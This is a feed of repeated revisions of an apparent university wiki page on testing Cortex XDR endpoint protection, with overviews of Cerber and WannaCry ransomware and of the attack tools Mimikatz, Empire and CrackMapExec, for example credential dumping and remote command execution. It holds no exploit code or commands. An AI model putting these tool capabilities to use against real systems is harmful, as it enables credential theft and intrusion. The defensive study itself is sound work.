Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
 From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
 Create a new installation package.&lt;br /&gt;
 Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
 Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
 Specify the installation package settings.&lt;br /&gt;
 Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
 Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11467</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11467"/>
		<updated>2023-02-03T16:49:46Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting With Cortex XDR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
# From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
# Create a new installation package.&lt;br /&gt;
# Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
# Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
##Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
##Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
##(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
##Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
# Specify the installation package settings.&lt;br /&gt;
# Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
# Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
#*For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
#*For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
#*For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11466</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11466"/>
		<updated>2023-02-03T16:48:12Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting With Cortex XDR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
